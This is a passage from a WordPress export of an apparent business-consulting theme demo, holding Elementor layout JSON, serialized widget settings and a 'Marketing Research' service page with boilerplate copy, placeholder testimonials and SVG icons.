		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d5a76aa","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"234f86e","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1cf82f6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ce2318b","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"5510dd0","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ef1670e","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"9a1cf24","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"063a9d3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"72f750e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"849b54f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":1413},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"c431466","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e0e8d01","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":1414},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2269d28","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"56e56e3","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"390869d","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"075d0cf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4bdc329","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"d45a6c2","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a93d254","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"41d2371","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"a342583","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"4685821","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"34b430f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"793fbd6","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ed2b68f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/deal.svg","id":887},"library":"svg"},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":48,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"58be6ce","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"798624b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e92783c","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-icon.jpg","id":890},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"180","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"90","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"374524a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4de5108","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"f57a371","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"9728125","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"00c712c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"2dd99d7","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"870bb75","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"40edabd","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"cfe5e81","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"a078a65","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/themes\/maxbizz\/images\/avatar-1.png"},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]},"tcontent_color":"#616161"},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"79d9b22","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e929e8c","elType":"section","settings":{"content_width":{"unit":"px","size":1340,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"81d098c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8de62dc","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#FF8F3E","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"07f2dc1","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"be75dc6","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"91c3045","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"5c296ee","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:6:"column";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:23;s:19:"_inline_size_tablet";i:14;}}s:8:"advanced";a:2:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:14:"subtitle_style";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:7;}s:14:"section_layout";a:4:{s:6:"layout";i:6;s:3:"gap";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:7;s:14:"padding_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:8;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:8;s:5:"title";i:8;s:3:"des";i:8;s:4:"link";i:8;}}s:5:"style";a:1:{s:18:"style_icon_section";a:2:{s:9:"is_border";i:8;s:9:"icon_size";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:5;s:15:"_padding_mobile";i:3;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:2:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}s:13:"style_general";a:1:{s:14:"tcontent_color";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Marketing Research</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/</link>
		<pubDate>Mon, 14 Sep 2020 07:28:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=898</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h5>How It Works &amp; How We Do It</h5>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h5>Business Planning &amp; Strategy</h5>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h6>Services</h6>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h6>Contacts</h6>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
